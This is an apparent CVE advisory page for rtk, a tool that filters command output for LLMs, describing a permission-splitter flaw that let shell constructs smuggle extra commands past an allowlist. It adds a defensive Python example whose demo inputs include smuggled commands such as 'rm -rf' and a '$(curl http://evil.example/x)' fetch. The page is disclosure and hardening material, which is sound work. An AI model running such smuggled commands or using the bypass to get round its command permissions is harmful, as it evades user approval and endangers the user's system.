CVE-2026-54555: rtk filters and compresses command outputs before they reach your LLM context. Prior to 0.42.2, the permission splitter
Summary
rtk is a tool that filters and compresses command outputs before sending them to an LLM (large language model). Before version 0.42.2, rtk's permission splitter, the component that decides whether a command line is allowed to run, did not recognise certain shell constructs (Bash syntax that causes additional commands to execute). An attacker who could influence the command line could therefore hide unauthorized commands behind an allowed leading command such as "git", and the hidden commands ran without the user's approval.
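The failure mode described above, as an added illustration that is not rtk's code: a "naive" splitter that only knows a few separators (`&&`, `||`, `;`, `|`) is compared with a quote-aware splitter that fails closed on command and process substitution and treats every separator it models as a command boundary. The advisory does not say which constructs rtk's splitter missed, so the bypass inputs below are constructed examples of classic shell constructs, not the ones from the CVE; the allowlist (`git`, `ls`, `cat`) is likewise assumed for the demo.

```python
"""Illustrative command-allowlist splitters (constructed example, not rtk's code).

The page does not state which constructs rtk mis-handled; the inputs in
demo() are generic shell constructs chosen to show the class of bug.
"""
import re
from typing import List, Optional

ALLOWLIST = {"git", "ls", "cat"}  # assumed allowlist for the demonstration


def naive_split(cmdline: str) -> List[str]:
    """Splitter that knows only &&, ||, ; and |, returns each segment's first word.

    It is not quote-aware and ignores newlines, '&' and $(...), so anything
    joined to an allowed command by those constructs rides through unchecked.
    """
    parts = re.split(r"&&|\|\||;|\|", cmdline)
    return [p.split()[0] for p in parts if p.split()]


def naive_allowed(cmdline: str) -> bool:
    return all(cmd in ALLOWLIST for cmd in naive_split(cmdline))


def hardened_split(cmdline: str) -> Optional[List[str]]:
    """Quote-aware splitter that returns None (deny) on anything it cannot model.

    Outside single quotes, `...` and $(...) run commands even inside double
    quotes, so they are refused outright rather than guessed at.  Unquoted
    ';', '&', '|' and newline end a segment; <( ) and >( ) process
    substitution and unbalanced quotes are refused.
    """
    commands: List[str] = []
    word: List[str] = []        # characters of the current segment's first word
    first_word_done = False
    in_single = in_double = False
    i, n = 0, len(cmdline)

    def end_segment() -> None:
        nonlocal word, first_word_done
        if word:
            commands.append("".join(word))
        word = []
        first_word_done = False

    while i < n:
        c = cmdline[i]
        nxt = cmdline[i + 1] if i + 1 < n else ""
        if in_single:                       # nothing is special inside '...'
            if c == "'":
                in_single = False
            elif not first_word_done:
                word.append(c)
            i += 1
            continue
        if c == "`" or (c == "$" and nxt == "("):
            return None                     # command substitution: fail closed
        if c == "\\":                       # escaped character is always literal
            if nxt and not first_word_done:
                word.append(nxt)
            i += 2
            continue
        if in_double:
            if c == '"':
                in_double = False
            elif not first_word_done:
                word.append(c)
            i += 1
            continue
        if c == "'":
            in_single = True
        elif c == '"':
            in_double = True
        elif c in "<>" and nxt == "(":
            return None                     # process substitution: fail closed
        elif c in "<>" and nxt == "&":      # fd duplication such as 2>&1
            i += 2
            continue
        elif c in ";&|\n":
            end_segment()
        elif c in " \t":
            if word:
                first_word_done = True
        elif not first_word_done:
            word.append(c)
        i += 1
    if in_single or in_double:
        return None                         # unbalanced quotes: refuse to guess
    end_segment()
    return commands


def hardened_allowed(cmdline: str) -> bool:
    cmds = hardened_split(cmdline)
    return cmds is not None and all(cmd in ALLOWLIST for cmd in cmds)


def demo() -> None:
    # Constructed inputs; the second, third and fourth slip past the naive splitter.
    for line in ["git status && git log",
                 "git status\nrm -rf /tmp/x",
                 "git log $(curl http://evil.example/x)",
                 "git status & rm -rf /tmp/x",
                 "git commit -m 'fix; not a command'"]:
        print(repr(line), "naive:", naive_allowed(line), "hardened:", hardened_allowed(line))


if __name__ == "__main__":
    demo()
```

The design point is that the hardened splitter does not try to enumerate every way Bash can start a second command; when it meets a construct it does not model (command or process substitution, an unbalanced quote) it denies the whole line, which is the direction a permission check should err in.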
Solution / Mitigation
This vulnerability is fixed in version 0.42.2; upgrade rtk to 0.42.2 or later.
Vulnerability Details
Severity: 7.8 (High)
EPSS: 0.0%
CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector: Local
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Published: June 23, 2026
Original source: https://nvd.nist.gov/vuln/detail/CVE-2026-54555
First tracked: June 24, 2026 at 02:13 AM
Classified by LLM (prompt v3) · confidence: 92%